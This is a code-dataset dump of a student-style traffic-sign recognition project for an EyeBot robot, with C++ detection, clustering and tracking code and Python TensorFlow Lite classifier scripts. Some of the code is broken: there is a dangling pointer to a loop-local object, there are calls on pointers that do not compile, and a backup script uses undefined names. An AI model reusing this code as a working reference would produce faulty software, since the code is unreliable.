ys;\n }\n \n ROI (int x, int y, int xs, int ys, int priority) {\n this->x = x;\n this->y = y;\n this->xs = xs;\n this->ys = ys;\n this->priority = priority;\n }\n \n ROI (int x, int y, int xs, int ys, int priority, int ref) {\n this->x = x;\n this->y = y;\n this->xs = xs;\n this->ys = ys;\n this->priority = priority;\n this->ref = ref;\n }\n };\n bool compareROIs (ROI a, ROI b) { return a.priority>b.priority; }\n \n class Detection {\n public:\n int object_class;\n double confidence;\n int x,y; // x,y coords of top left corner\n int xs,ys; // width, height respectively\n Cluster* associated_cluster;\n \n Detection (int object_class, double confidence, int x, int y, int xs, int ys, Cluster *cluster) {\n this->object_class = object_class;\n this->confidence = confidence;\n this->x = x;\n this->y = y;\n this->xs = xs;\n this->ys = ys;\n this->associated_cluster = cluster;\n }\n \n Detection (int object_class, double confidence, int x, int y, int xs, int ys) {\n this->object_class = object_class;\n this->confidence = confidence;\n this->x = x;\n this->y = y;\n this->xs = xs;\n this->ys = ys;\n }\n };\n \n class Detection_Profile {\n public:\n int x,y;\n int xs,ys;\n double reliability;\n std::list<Detection *> detections;\n int num_detections;\n \n int life_counter;\n \n Detection_Profile() {}\n \n void update_profile() {\n double tmp = pow(2.0, double(num_detections) );\n life_counter = int(tmp);\n \n }\n \n void tick_tock() {\n life_counter--;\n }\n \n void add_detection(Detection* d) {\n this->detections.push_back(d);\n num_detections++;\n update_profile();\n }\n \n };\n}\n" }, { "alpha_fraction": 0.8039867281913757, "alphanum_fraction": 0.8039867281913757, "avg_line_length": 29.100000381469727, "blob_id": "f866fc1b4154d72385caa7deaf3b7a8a7149962c", "content_id": "e69b08599e801a130ab6c1d38ffeeeecb19f88c6", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "CMake", "length_bytes": 301, "license_type": "no_license", "max_line_length": 83, "num_lines": 10, "path": "/clusterbased-build/CMakeFiles/TrafficSignRecognition.dir/cmake_clean.cmake", "repo_name": "jordanking94/TrafficSigns", "src_encoding": "UTF-8", "text": "file(REMOVE_RECURSE\n \"CMakeFiles/TrafficSignRecognition.dir/tsr.cpp.o\"\n \"TrafficSignRecognition.pdb\"\n \"TrafficSignRecognition\"\n)\n\n# Per-language clean rules from dependency scanning.\nforeach(lang CXX)\n include(CMakeFiles/TrafficSignRecognition.dir/cmake_clean_${lang}.cmake OPTIONAL)\nendforeach()\n" }, { "alpha_fraction": 0.7382352948188782, "alphanum_fraction": 0.7441176176071167, "avg_line_length": 29.81818199157715, "blob_id": "3d4c94eda7f44ef282df40aaaf997dc03b9713a3", "content_id": "dbb38e0d7cf2404a98d91eafffaf6fed394d2e6f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 340, "license_type": "no_license", "max_line_length": 98, "num_lines": 11, "path": "/clusterbased-build/tf_files/tflite_converter.py", "repo_name": "jordanking94/TrafficSigns", "src_encoding": "UTF-8", "text": "import numpy as np\nimport cv2\nimport tensorflow.compat.v1 as tf\n\n\ninput_arrays = [\"input\"]\noutput_arrays = [\"final_result\"]\ngraph_def_file = \"./saved_model.pb\"\nconverter = tf.lite.TFLiteConverter.from_frozen_graph(graph_def_file, input_arrays, output_arrays)\ntflite_model = converter.convert()\nopen(\"model.lite\", \"wb\").write(tflite_model)\n\n" }, { "alpha_fraction": 0.5356045961380005, "alphanum_fraction": 0.5576838850975037, "avg_line_length": 27.615062713623047, "blob_id": "761e17d32f8e62b18a34e741121cf7a78f08d60d", "content_id": "966f4b929b433b23ddc0e16d357232bac53187ad", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 13678, "license_type": "no_license", "max_line_length": 124, "num_lines": 478, "path": "/clusterbased/backup/tsr.cpp", "repo_name": "jordanking94/TrafficSigns", "src_encoding": "UTF-8", "text": "#include <Python.h>\n#include <opencv2/opencv.hpp>\n#include \"eyebot++.h\"\n#include \"TSDR.hpp\"\n\n#include <cstdio>\n#include <string>\n#include <chrono>\n#include <vector>\n#include <algorithm>\n#include <cmath>\n#include <iostream>\n#include <fstream>\n\nusing namespace cv;\nusing namespace std;\nusing namespace chrono;\nusing namespace TSDR;\n\n#define RESOLUTION QVGA\n#define SIZE QVGA_SIZE\n#define PIXELS QVGA_PIXELS\n#define WIDTH QVGA_X\n#define HEIGHT QVGA_Y\n#define MAX_LABELS 20\n#define FREQ1 15//15\n#define NO_HUE 255\n\n#define FOREGROUND 1\n#define BACKGROUND 0\n\n#define ELEMENT_SHAPE MORPH_ELLIPSE//MORPH_RECT\n#define EROSION_SIZE 1\n#define EROSION_ITERATIONS 1\n#define DILATION_SIZE 3//6\n#define DILATION_ITERATIONS 2//1\n\n#define ROI_FROM_BLOB_SIZE 0\n#define TRACKING_DISTANCE_THRESHOLD 35\n\n#define MAX_CLASSIFICATIONS_PER_FRAME 1\n#define KEYPOINT_RADII 5\n\n#define DETECTION_THRESHOLD 5 // number of keypoints in cluster before it is recorded as an ROI\n\nvoid Program_Initialisation();\nint Python_Initialisation();\nvoid generateSessionID();\nvoid read_labels();\nvoid traffic_sign_detection();\nvoid RGB2HSI(BYTE* rgb, BYTE* hsi);\nvoid HSI2BIN(BYTE* hsi, BYTE* bin);\nvoid Dilation(Mat *InputArray, Mat *OutputArray);\nvoid Erosion(Mat *InputArray, Mat *OutputArray);\nvoid showROIs(list<ROI>* ROIs);\nvoid detectClusters(vector<Cluster>* clusters);\nvoid detectROIs(list<ROI>* ROIs, vector<Cluster*>* clusters);\nvoid classification(list<ROI>* ROIs, list<Detection>* detections);\nvoid show_detections(list<Detection>* detections);\n\nBYTE rgb[SIZE];\nBYTE hsi[SIZE];\nBYTE bin[PIXELS];\nBYTE mask[PIXELS];\n\nMat rgbMat;\nMat hsiMat;\nMat binMat;\nMat maskMat;\n\nlist <Detection> detections;\n\nvector <string> labels;\n\nMat cc_labelImage;\nMat cc_stats;\nMat cc_centroids;\n\nPyObject *pModule, *pFunc;\n\nchar sessionID[15];\nint num = 0;\n\nint colourmap[] = {LIGHTGRAY, CYAN, MAGENTA, ORANGE, RED, BLUE, PURPLE,\n MAROON, YELLOW, TEAL, NAVY, OLIVE, GREEN,\n SILVER, GRAY, DARKGRAY};\n\nint main() {\n LCDSetPrintf(0,0, \"[PLEASE WAIT]\");\n \n Program_Initialisation();\n int py_error = Python_Initialisation();\n if(py_error!=0) return py_error;\n \n LCDMenu(\"\",\"\",\"\",\"END\");\n \n while(1) {\n static high_resolution_clock::time_point tc;\n tc = high_resolution_clock::now();\n \n CAMGet(rgb);\n \n /* non-interupt timer 1 */\n static high_resolution_clock::time_point t1 = high_resolution_clock::now();\n static float td_1;\n td_1 = (duration_cast<duration<double> >(tc-t1)).count();\n if( 1000/FREQ1 < 1000*td_1) {\n traffic_sign_detection();\n t1 = high_resolution_clock::now();\n }\n \n /* io */\n static int key;\n key = KEYRead();\n if(key == KEY4) break;\n }\n \n CAMRelease();\n \n Py_XDECREF(pFunc);\n Py_DECREF(pModule);\n \n if (Py_FinalizeEx() < 0) {\n return 1;\n }\n \n return 0;\n}\n\nvoid Program_Initialisation() {\n read_labels();\n generateSessionID();\n CAMInit(RESOLUTION);\n\n binMat = Mat(HEIGHT,WIDTH, CV_8UC1, bin);\n maskMat = Mat(HEIGHT,WIDTH, CV_8UC1, mask);\n rgbMat = Mat(HEIGHT, WIDTH, CV_8UC3, rgb);\n}\n\nint Python_Initialisation() {\n char *app_name = (char *)\"EyeBot Traffic Sign Recognition and Detection\";\n Py_SetProgramName((wchar_t*)app_name);\n Py_Initialize();\n \n PyRun_SimpleString(\"import sys\");\n PyRun_SimpleString(\"sys.path.append(\\\"./scripts/\\\")\");\n \n PyObject *pName = PyUnicode_FromString(\"label\");\n pModule = PyImport_Import(pName);\n Py_DECREF(pName);\n \n if(pModule==NULL) {\n PyErr_Print();\n Py_DECREF(pModule);\n return -1;\n }\n \n pFunc = PyObject_GetAttrString(pModule, \"label\");\n if(!pFunc || !PyCallable_Check(pFunc)) {\n if (PyErr_Occurred()) PyErr_Print();\n Py_XDECREF(pFunc);\n Py_DECREF(pModule);\n return -1;\n }\n \n return 0;\n}\n\n\nvoid generateSessionID()\n{ time_t rawtime;\n struct tm * timeinfo;\n time (&rawtime);\n timeinfo = localtime (&rawtime);\n strftime(sessionID, 15, \"%G%m%d%H%M%S\", timeinfo);\n}\n\nvoid read_labels() {\n ifstream f;\n f.open(\"tf_files/labels.txt\");\n while(!f.eof()) {\n string s;\n getline(f,s);\n labels.push_back(s);\n }\n f.close();\n return;\n}\n\nvoid Dilation(Mat *InputArray, Mat *OutputArray) {\n static Mat element = getStructuringElement( ELEMENT_SHAPE,\n Size( 2*DILATION_SIZE + 1, 2*DILATION_SIZE + 1 ),\n Point( DILATION_SIZE, DILATION_SIZE ) );\n dilate(*InputArray, *OutputArray, element, Point(-1,-1), DILATION_ITERATIONS);\n}\n\nvoid Erosion(Mat *InputArray, Mat *OutputArray) {\n static Mat element = getStructuringElement( ELEMENT_SHAPE,\n Size( 2*EROSION_SIZE + 1, 2*EROSION_SIZE + 1 ),\n Point( EROSION_SIZE, EROSION_SIZE ) );\n erode(*InputArray, *OutputArray, element, Point(-1,-1), EROSION_ITERATIONS);\n}\n\nvoid showROIs(list<ROI>* ROIs) {\n list<ROI>::iterator it;\n for (it = ROIs->begin(); it != ROIs->end(); it++) {\n int x = it->x;\n int y = it->y;\n int xs = it->xs;\n int ys = it->ys;\n LCDArea(x,y,x+xs,y+ys,GREEN,0);\n }\n return;\n}\n\nvoid trackDetections(list<ROI>* ROIs, list<Detection>* detections) {\n list<Detection>::iterator it1;\n for (it1=detections->begin(); it1!=detections->end();it1++) {\n list<ROI>::iterator it2;\n for(it2=ROIs->begin();it2!=ROIs->end();it2++) {\n int it1_xc = it1->x + it1->xs/2;\n int it1_yc = it1->y + it1->ys/2;\n int it2_xc = it2->x + it2->xs/2;\n int it2_yc = it2->y + it2->ys/2;\n \n int dx = it1_xc-it2_xc;\n int dy = it1_yc-it2_yc;\n \n int dist = sqrt(dx*dx+dy*dy);\n if(dist < TRACKING_DISTANCE_THRESHOLD) {\n \n it1->x = it2->x;\n it1->y = it2->y;\n it1->xs = it2->xs;\n it1->ys = it2->ys;\n\n ROIs->erase(it2);\n break;\n }\n }\n // if it has reached this point, it cannot be tracked\n if( it2==ROIs->end() ) {\n it1 = detections->erase(it1);\n it1--;\n }\n }\n return;\n \n}\n\nvoid detectClusters(vector<Cluster*>* clusters) {\n RGB2HSI(rgb, hsi);\n HSI2BIN(hsi,bin);\n Erosion(&binMat, &maskMat);\n Dilation(&maskMat, &maskMat);\n \n int nLabels = connectedComponentsWithStats(maskMat, cc_labelImage, cc_stats, cc_centroids, 8);\n \n for(int i = 1; i<nLabels; i++) {\n int x = cc_stats.at<int>(Point(0, i));\n int y = cc_stats.at<int>(Point(1, i));\n int w = cc_stats.at<int>(Point(2, i));\n int h = cc_stats.at<int>(Point(3, i));\n Cluster c = Cluster(i,x,y,w,h);\n clusters->push_back(&c);\n }\n \n static vector<KeyPoint> keypoints;\n static vector<int> keypoint_indexes;\n static Mat image = Mat(HEIGHT,WIDTH, CV_8UC3, rgb);\n \n //static Ptr<ORB> detector = ORB::create();\n static Ptr<FastFeatureDetector> detector = FastFeatureDetector::create();\n \n static Mat t_mask = Mat::zeros(HEIGHT,WIDTH,CV_8U);\n t_mask(Rect(0,0,WIDTH,HEIGHT)) = 1;\n detector->detect(image, keypoints, t_mask);\n \n // to display keypoints\n /*\n vector<KeyPoint>::iterator it;\n for(it=keypoints.begin(); it!=keypoints.end(); ++it) {\n int x = (int) it->pt.x;\n int y = (int) it->pt.y;\n int label = cc_labelImage.at<int>(y, x);\n LCDCircle(x, y, KEYPOINT_RADII, colourmap[label], 0);\n }\n */\n vector<KeyPoint>::iterator it3;\n for(it3=keypoints.begin(); it3!=keypoints.end(); ++it3) {\n int x = (int) it3->pt.x;\n int y = (int) it3->pt.y;\n int label = cc_labelImage.at<int>(y, x);\n if(label!=0) {\n //Cluster c = clusters[label-1];\n clusters->at(label-1)->add_keypoint(*it3);\n //*clusters[label-1].add_keypoint(*it3);\n }\n }\n \n}\n\nvoid detectROIs(list<ROI> *ROIs, vector<Cluster*> *clusters) {\n for(int i=0; i<int(clusters.size()); i++) {\n if(clusters->at[i]->n >= DETECTION_THRESHOLD) {\n int x,y,xs,ys;\n \n if(ROI_FROM_BLOB_SIZE) {\n x = clusters[i].x;\n y = clusters[i].y;\n xs = clusters[i].w;\n ys = clusters[i].h;\n }\n else {\n x = clusters[i].kp_xmin;\n y = clusters[i].kp_ymin;\n xs = clusters[i].kp_xmax - clusters[i].kp_xmin;\n ys = clusters[i].kp_ymax - clusters[i].kp_ymin;\n }\n int priority = clusters[i-1].n;\n \n ROI r = ROI(x,y,xs,ys,priority );\n ROIs->push_back(r);\n }\n }\n\n // sort ROIs\n ROIs->sort(compareROIs);\n return;\n}\n\nvoid traffic_sign_detection() {\n /*\n 1. detect ROIs (input: rgb image; output: list of ROIs\n 2. perform non-maxima suppression\n 3. track existant detections\n 4. choose highest-priority ROI to classify\n 5. perform classification and return new detection\n 6. display detections\n */\n LCDImageStart(0,0,WIDTH,HEIGHT);\n LCDImage(rgb);\n //LCDImageStart(0,0,WIDTH,HEIGHT);\n //LCDImageBinary(mask);\n \n static high_resolution_clock::time_point t1;\n t1 = high_resolution_clock::now();\n \n vector<Cluster> clusters;\n list<ROI> ROIs;\n \n detectClusters(&clusters);\n detectROIs(&ROIs, &clusters);\n //trackDetections(&ROIs, &detections);\n showROIs(&ROIs);\n //classification(&ROIs, &detections);\n //show_detections(&detections);\n \n static high_resolution_clock::time_point t2;\n t2 = high_resolution_clock::now();\n static float td;\n td = (duration_cast<duration<double> >(t2-t1)).count();\n \n printf(\"td: %f\\n\", td);\n return;\n}\n\nvoid RGB2HSI(BYTE* rgb, BYTE* hsi)\n{ int i;\n for(i=0; i<PIXELS; i++)\n { int r,g,b,max,min,delta;\n BYTE hue = 0;\n r=rgb[3*i];\n g=rgb[3*i+1];\n b=rgb[3*i+2];\n \n max = MAX(r,MAX(g,b));\n min = MIN(r,MIN(g,b));\n delta = max - min;\n \n if (2*delta <= max) hue = NO_HUE;\n else\n {\n if (r==max) hue = 42 + 42*int(double(g-b)/double(delta));\n else if (g==max) hue = 126 + 42*int(double(b-r)/double(delta));\n else if (b==max) hue = 210 + 42*int(double(r-g)/double(delta));\n }\n \n hsi[3*i] = hue;\n if(max==0) hsi[3*i+1] = 0;\n else hsi[3*i+1] = 255 - 3*int(255.0*double(min)/double(r+g+b));\n hsi[3*i+2]= (r+g+b)/3;\n }\n}\n\nvoid HSI2BIN(BYTE* hsi, BYTE* bin)\n{ int i;\n int hue, saturation, intensity;\n for(i=0; i<PIXELS; i++)\n { hue = hsi[3*i];\n saturation = hsi[3*i+1];\n intensity = hsi[3*i+2];\n \n bin[i] = BACKGROUND;\n //if( ((0<=hue&&hue<=25)||(325<=hue&&hue<=360))&&(saturation>=50)&&(intensity>25) ) bin[i] = 0; // stop signs\n if( ((0<=hue&&hue<=45)||(325<=hue&&hue<=360))&&(saturation>=50)&&(intensity>25) ) bin[i] = FOREGROUND; // stop signs\n else if( (35<=intensity&&intensity<=75)&&(180<=hue&&hue<=250) ) bin[i] = FOREGROUND; // parking\n else if ( (intensity>130)&&(saturation<=50) ) bin[i] = FOREGROUND; //white\n }\n}\n\nvoid classification(list<ROI>* ROIs, list<Detection>* detections) {\n for(int i=0; i< MAX_CLASSIFICATIONS_PER_FRAME; i++) {\n int index;\n double confidence;\n \n if(ROIs->empty()) return;\n ROI *roi = &ROIs->front();\n\n PyObject *pArgs = PyTuple_New(5);\n char *img_data = (char *)rgbMat.data;\n \n int len = SIZE;\n \n PyObject *pValue1 = PyMemoryView_FromMemory(img_data,len,PyBUF_READ);\n if (!pValue1) {\n Py_XDECREF(pValue1);\n Py_DECREF(pArgs);\n Py_DECREF(pModule);\n fprintf(stderr, \"Cannot convert argument\\n\");\n return;\n }\n PyTuple_SetItem(pArgs, 0, pValue1);\n PyTuple_SetItem(pArgs, 1, PyLong_FromLong(roi->x)); // set x\n PyTuple_SetItem(pArgs, 2, PyLong_FromLong(roi->y)); // set y\n PyTuple_SetItem(pArgs, 3, PyLong_FromLong(roi->xs)); // set xs\n PyTuple_SetItem(pArgs, 4, PyLong_FromLong(roi->ys)); // set ys\n\n PyObject *pValue2 = PyObject_CallObject(pFunc, pArgs);\n if (pValue2 != NULL) {\n index = int(PyLong_AsLong(PyTuple_GetItem(pValue2,0)));\n confidence = PyFloat_AsDouble(PyTuple_GetItem(pValue2,1));\n Py_XDECREF(pValue2);\n }\n else {\n Py_XDECREF(pValue2);\n PyErr_Print();\n fprintf(stderr,\"Call failed\\n\");\n return;\n }\n \n Detection observed(index, confidence,roi->x,roi->y,roi->xs,roi->ys );\n detections->push_back(observed);\n \n ROIs->pop_front();\n }\n \n return;\n}\n\nvoid show_detections(list<Detection>* detections) {\n list<Detection>::iterator it1;\n for (it1=detections->begin(); it1!=detections->end();it1++) {\n if(it1->object_class==0) continue;\n \n const static float X_M= 0.18;\n const static float X_C= -2.3;\n const static float Y_M= 0.06;\n const static float Y_C= 1.4;\n \n LCDArea(it1->x,it1->y,it1->x+it1->xs-1,it1->y+it1->ys-1,YELLOW,0);\n \n LCDSetPos(Y_M*it1->y+Y_C,X_M*it1->x+X_C);\n LCDPrintf(\"%s:%f\",labels[it1->object_class].c_str(),it1->confidence);\n }\n \n return;\n}\n" }, { "alpha_fraction": 0.6761193871498108, "alphanum_fraction": 0.6955223679542542, "avg_line_length": 24.417720794677734, "blob_id": "71fdaa6276b4442283f73dd913c863a570769763", "content_id": "3ec869c0ad6dca60ee78236a95bbdb015ddab90e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2010, "license_type": "no_license", "max_line_length": 71, "num_lines": 79, "path": "/LEGACY/fromRobot/ORB_DETECTION-build/scripts/label.py", "repo_name": "jordanking94/TrafficSigns", "src_encoding": "UTF-8", "text": "\n\nimport numpy as np\nimport tensorflow as tf\n#import cv2\n#print(\"here1\")\n#print(\"here1\")\n#print(\"here1\")\n\n#tf.enable_eager_execution()\n#tf.enable_eager_execution()\n#tf.compat.v1.enable_eager_execution\ntf.enable_eager_execution()\nmodel_path = \"tf_files/graph.lite\"\nprint(tf.__version__)\n \n# Load TFLite model and allocate tensors.\n#interpreter = tf.lite.Interpreter(model_path=model_path)\n\n#interpreter = tf.lite.Interpreter(model_path=path)\ninterpreter = tf.contrib.lite.Interpreter(model_path=model_path)\nprint(\"here\")\ninterpreter.allocate_tensors()\n\n \n# Get input and output tensors.\ninput_details = interpreter.get_input_details()\noutput_details = interpreter.get_output_details()\n\ninput = interpreter.tensor(input_details[0][\"index\"])\noutput = interpreter.tensor(output_details[0][\"index\"])\n\nmean = 128\nstd_dev = 127\n\nheight = input_details[0]['shape'][1]\nwidth = input_details[0]['shape'][2]\n\nfloating_model = False\nif input_details[0]['dtype'] == type(np.float32(1.0)):\n floating_model = True\n\n\ndef label(img_data,img_height, img_width):\n #print(img_height)\n #print(img_width)\n image = np.asarray(img_data,dtype=\"uint8\")\n image = np.reshape(image, (1,img_height, img_width, 3))\n \n #cv2.imwrite(\"image.jpg\", image)\n #cv2.waitKey(0)\n\n if floating_model:\n #print(\"floating model\")\n image = np.float32(image)\n image = (image - mean) / std_dev\n \n \n interpreter.set_tensor(input_details[0]['index'], image)\n interpreter.invoke()\n\n\n#print(\"hello-1\")\n #output_tensor = interpreter.get_tensor(output_details[0]['index'])\n\n#print(output_tensor)\n\n#predictions = np.squeeze(output_tensor)\n predictions = np.squeeze(output()[0])\n#print(predictions)\n predicted_confidence = max(predictions)\n#print(\"hello0\")\n object_class = np.where(predictions==predicted_confidence)\n\n#print(\"hello1\")\n object_class = object_class[0][0]\n#print(\"hello2\")\n\n#print(object_class)\n#print(predicted_confidence)\n return (object_class, predicted_confidence)\n" }, { "alpha_fraction": 0.5955414175987244, "alphanum_fraction": 0.615180492401123, "avg_line_length": 31.482759475708008, "blob_id": "3b2307ff722570577cef12fd1d778139e4f582aa", "content_id": "5aa14a6661550d19d3bb12b887d57f9c6937d8bd", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1884, "license_type": "no_license", "max_line_length": 80, "num_lines": 58, "path": "/LEGACY/fromRobot/ORB_DETECTION-build/scripts/backup/label.py", "repo_name": "jordanking94/TrafficSigns", "src_encoding": "UTF-8", "text": "# Copyright 2017 The TensorFlow Authors. All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n# ==============================================================================\n\nif __name__ == \"__main__\":\n\n file_path = \"tmp/1.jpg\"\n height = input_details[0]['shape'][1]\n width = input_details[0]['shape'][2]\n img = cv2.imread(file_path)\n resized = cv2.resize(img, (width, height))\n \n floating_model = False\n \n if input_details[0]['dtype'] == type(np.float32(1.0)):\n floating_model = True\n\n # add N dim\n input_data = np.expand_dims(resized, axis=0)\n\n input_data = np.float32(input_data)\n\n if floating_model:\n input_data = (np.float32(input_data) - input_mean) / input_std\n \n interpreter.set_tensor(input_details[0]['index'], input_data)\n \n interpreter.invoke()\n \n \n output_data = interpreter.get_tensor(output_details[0]['index'])\n#print(\"inference %s\" % output_data)\n \n \n start = time.time()\n \n output_data = interpreter.get_tensor(output_details[0]['index'])\n \n # removes signle-dimension entries from shape of array\n # the shape of the input tensor is [1 128 128 3]\n results = np.squeeze(output_data)\n \n print labels\n print results\n \n end=time.time()\n print('\\nLABEL: {:.5f} seconds'.format(end-start))\n" }, { "alpha_fraction": 0.4172859787940979, "alphanum_fraction": 0.4243049919605255, "avg_line_length": 28.06399917602539, "blob_id": "e7c076da265c413c373cded04e1f37f19dcd5165", "content_id": "6298736aae9dd8671e81a06f61654be1714efe1f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 7266, "license_type": "no_license", "max_line_length": 118, "num_lines": 250, "path": "/clusterbased/TSDR.hpp", "repo_name": "jordanking94/TrafficSigns", "src_encoding": "UTF-8", "text": "#define MAX_DETECTIONS 50\n#define MAX_LABELS 20\n#define E_CONST 2.71828\n\n#define ALPHA 2.0\n#define BETA 1.0\n\nnamespace TSDR\n{\n class Cluster {\n public:\n int id;\n int x, y, w, h;\n int n; // number of keypoints in cluster\n \n int kp_xmin, kp_ymin;\n int kp_xmax, kp_ymax;\n \n std::list<cv::KeyPoint> associated;\n \n Cluster () {}\n\n void add_keypoint(cv::KeyPoint kp) {\n this->associated.push_back(kp);\n this->n++;\n int x = int(kp.pt.x);\n int y = int(kp.pt.y);\n if(x<this->kp_xmin) this->kp_xmin=x;\n else if(x>this->kp_xmax) this->kp_xmax=x;\n if(y<this->kp_ymin) this->kp_ymin=y;\n else if(y>this->kp_ymax) this->kp_ymax=y;\n }\n \n Cluster(int id, int x, int y, int w, int h) {\n this->id = id;\n this->x = x;\n this->y = y;\n this->w = w;\n this->h = h;\n \n kp_xmin=INT_MAX;\n kp_xmax=0;\n kp_ymin=INT_MAX;\n kp_ymax=0;\n }\n \n };\n \n class ROI {\n public:\n int x, y; // x, y coords of top left corner\n int xs, ys; // width, height respectively\n int priority;\n Cluster *cluster;\n int tag = -1;\n \n ROI (int x, int y, int xs, int ys) {\n this->x = x;\n this->y = y;\n this->xs = xs;\n this->ys = ys;\n }\n \n ROI (int x, int y, int xs, int ys, int priority) {\n this->x = x;\n this->y = y;\n this->xs = xs;\n this->ys = ys;\n this->priority = priority;\n }\n \n ROI (int x, int y, int xs, int ys, int priority, Cluster *cluster) {\n this->x = x;\n this->y = y;\n this->xs = xs;\n this->ys = ys;\n this->priority = priority;\n this->cluster = cluster;\n }\n };\n bool compareROIs (ROI a, ROI b) { return a.priority>b.priority; }\n \n class Detection {\n public:\n int object_class;\n double confidence;\n int x,y; // x,y coords of top left corner\n int xs,ys; // width, height respectively\n Cluster* associated_cluster;\n \n Detection (int object_class, double confidence, int x, int y, int xs, int ys, Cluster *cluster) {\n this->object_class = object_class;\n this->confidence = confidence;\n this->x = x;\n this->y = y;\n this->xs = xs;\n this->ys = ys;\n this->associated_cluster = cluster;\n }\n \n Detection (int object_class, double confidence, int x, int y, int xs, int ys) {\n this->object_class = object_class;\n this->confidence = confidence;\n this->x = x;\n this->y = y;\n this->xs = xs;\n this->ys = ys;\n }\n };\n \n class Detection_Profile {\n public:\n // current location\n int x,y;\n int xs,ys;\n \n double reliability;\n int predicted_class;\n \n double data[MAX_LABELS][MAX_DETECTIONS] = {{0.0}};\n \n double reliability_array[MAX_LABELS] = {0.0};\n double softmaxReliability_array[MAX_LABELS] = {0.0};\n \n std::list<Detection*> detections;\n int N_d = 0; // number of times detected\n int ticks_left; // time until it will need to be detected again\n \n void setCounter() {\n ticks_left = int(pow(2,N_d));\n }\n void tick() {\n ticks_left--;\n }\n \n void predict() {\n int i = 0;\n int max_pos = -1;\n double max_val = -1.0;\n \n for(i=0; i< MAX_LABELS; i++) {\n if(softmaxReliability_array[i] > max_val ) {\n max_pos = i;\n max_val = softmaxReliability_array[i];\n }\n }\n \n this->reliability = max_val;\n this->predicted_class = max_pos;\n }\n \n void setReliabilityArray() {\n int i;\n for(i=0; i<MAX_LABELS; i++) {\n int j;\n int n = 0;\n double R = 1.0;\n for(j=0; j< MAX_DETECTIONS; j++) {\n if(j!=0) {\n n++;\n R = R*(1.0-data[i][j]);\n }\n }\n R = 1.0-R;\n reliability_array[i] =(1.0-pow(ALPHA, -BETA*double(n)))*R;\n }\n \n return;\n }\n \n void setSoftmaxArray() {\n int i;\n \n double denominator = 0.0;\n for(i=0; i< MAX_LABELS; i++) {\n if(reliability_array[i]!=0)\n denominator += pow(E_CONST, reliability_array[i]);\n }\n \n for(i=0; i< MAX_LABELS; i++) {\n if(reliability_array[i]!=0)\n softmaxReliability_array[i] = reliability_array[i]*pow(E_CONST, reliability_array[i])/denominator;\n }\n return;\n }\n \n \n void add_detection(Detection* _detection) {\n if(N_d>=MAX_DETECTIONS) return; // laziest thing I have done, but it should work\n this->x = _detection->x;\n this->y = _detection->y;\n this->xs = _detection->xs;\n this->ys = _detection->ys;\n \n this->detections.push_back(_detection);\n \n int object_class = _detection->object_class;\n double confidence = _detection->confidence;\n \n printf(\"class=%d, conf=%f\\n\", object_class, confidence);\n data[object_class][N_d] = confidence;\n \n N_d++;\n setCounter();\n setReliabilityArray();\n setSoftmaxArray();\n predict();\n }\n \n Detection_Profile(Detection* _detection) {\n this->x = _detection->x;\n this->y = _detection->y;\n this->xs = _detection->xs;\n this->ys = _detection->ys;\n this->detections.push_back(_detection);\n \n int object_class = _detection->object_class;\n double confidence = _detection->confidence;\n \n \n printf(\"class=%d, conf=%f\\n\", object_class, confidence);\n data[object_class][N_d] = confidence;\n \n N_d++;\n setCounter();\n setReliabilityArray();\n setSoftmaxArray();\n predict();\n }\n \n void printTable() {\n int i,j;\n /*\n for(j=0; j< MAX_DETECTIONS; j++) {\n for(i=0; i<MAX_LABELS; i++) {\n printf(\"%f, \", data[i][j]);\n }\n \n printf(\"\\n\"); }\n\n return;\n */\n for(i=0; i<MAX_LABELS; i++) {\n //printf(\"%f, \",reliability_array[i]);\n printf(\"%f, \", softmaxReliability_array[i]);\n }\n printf(\"\\n\");\n }\n };\n}\n" }, { "alpha_fraction": 0.5320630073547363, "alphanum_fraction": 0.5549852252006531, "avg_line_length": 26.996063232421875, "blob_id": "de68a26ade5aa4b5aca247b71b76acaf566c50e8", "content_id": "bf1b9910101e8441bdba61241d9761ffb7c0a157", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 14222, "license_type": "no_license", "max_line_length": 131, "num_lines": 508, "path": "/LEGACY/fromRobot/ORB_DETECTION/detector.cpp", "repo_name": "jordanking94/TrafficSigns", "src_encoding": "UTF-8", "text": "#include <opencv2/opencv.hpp>\n#include \"eyebot++.h\"\n#include <Python.h>\n#include <string>\n#include <chrono>\n#include <stdio.h>\n#include <vector>\n#include <algorithm> // for max and min\n#include <cmath>\n\n#include <iostream>\n#include <fstream>\n\n//#include <numpy/arrayobject.h>\n\n#include \"TSDR.cpp\"\n\n#define RESOLUTION QVGA\n#define SIZE QVGA_SIZE\n#define PIXELS QVGA_PIXELS\n#define WIDTH QVGA_X\n#define HEIGHT QVGA_Y\n\n#define MAX_LABELS 20\n\n#define FREQ1 15 /* in Hz */\n\nusing namespace cv;\nusing namespace std;\nusing namespace chrono;\nusing namespace TSDR;\n\nBYTE rgb[SIZE];\nvector <string> labels;\n\nPyObject *pModule, *pFunc;\n//PyObject *pArgs, *pValue1, *pValue2;\n\nchar sessionID[15];\nint num = 0;\n\nbool my_compare (ROI a, ROI b)\n{\n return a.priority > b.priority;\n}\n\nvoid generateSessionID()\n{ time_t rawtime;\n struct tm * timeinfo;\n time (&rawtime);\n timeinfo = localtime (&rawtime);\n strftime(sessionID, 15, \"%G%m%d%H%M%S\", timeinfo);\n}\n\nvoid detectROIs(list<ROI>& rois) {\n \n //static Mat grey;\n static vector<KeyPoint> keypoints;\n static vector<int> keypoint_indexes;\n static Mat image = cv::Mat(HEIGHT,WIDTH, CV_8UC3, rgb);\n //cv::cvtColor(image, grey, CV_RGB2GRAY);\n \n \n \n //static Ptr<FeatureDetector> detector = FeatureDetector::create(\"ORB\");\n static Ptr<ORB> detector = ORB::create();\n \n 